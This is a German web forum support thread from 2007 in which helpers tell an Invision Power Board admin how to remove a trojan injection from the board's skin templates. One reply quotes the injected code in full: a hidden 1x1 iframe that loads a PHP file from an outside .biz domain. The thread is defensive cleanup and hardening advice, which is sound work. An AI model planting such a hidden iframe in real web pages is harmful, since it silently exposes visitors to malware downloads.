Jump to content
InvisionCommunity.de - Der Deutsche Invision Community Support
Sign in to follow this  
kathrin

troyaner...

Recommended Posts

Sieht aber noch nicht ganz danach aus:

mySQL error: Too many connections

mySQL error code:

Date: Wednesday 17th of January 2007 08:44:05 PM

Share this post


Link to post

Hi Kathrin, den Eintrag entfernst Du wie folgt: geh in die ACP > Skins & Templates > |-- Board Wrappers.

Auf der rechten Seite findest du nun deine Skins. Jetzt mußt du bei Invision Board Standard auf Edit clicken.

Dort findest du zwischen "<body> " und "<div id="ipbwrapper"> " den Eintrag "<div style="VISIBILITY: hidden"><iframe

src="http://ydwrtyxamz.biz/dl/adv598.php" width=1

height=1></iframe></div> " evtl auch zwischen "</div>" und "</body>".

Entweder deaktivierst du es indem du eine Leerzeile davor einfügst und dort "<!-- " und eine Zeile danach mit "--> ".

Oder du löscht es einfach. Mache aber davor eine Sicherungskopie. Das mußt du mit allen Skins die du verwendest wiederholen.

Sicherheitsupdates für die version IPB 1.3 findest du unter anderem IBForen.de .

Als erstes solltest du dich in diesem Forum anmelden damit du die Updates herunterladen kannst.

Am besten installierst du sie über den ModInstaller zuerst mußt du aber den Patch IPB 1.3 to IPB 1.3.1 installieren wenn du das nicht schon gemacht hast.

Wenn du probleme dabei hast, kannst mich per PN anschreiben.

viele grüße aus München

Chriss

Share this post


Link to post

Ich hatte dieses Problem auch (siehe mein Thema http://www.ipbsupport.de/board/index.php?showtopic=5619 )

Grund war u.a. ein schlechtes passwort eines Admins. Ich habe die admin.php dann mit einer htaccess-Datei gesichert, wie dort beschrieben. Seither keine Probleme mehr. Ich kann die htaccess-Datei hier auch reinkopieren, wenn dudich nicht zurechtfindest.

Share this post


Link to post

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

Sign in to follow this  

×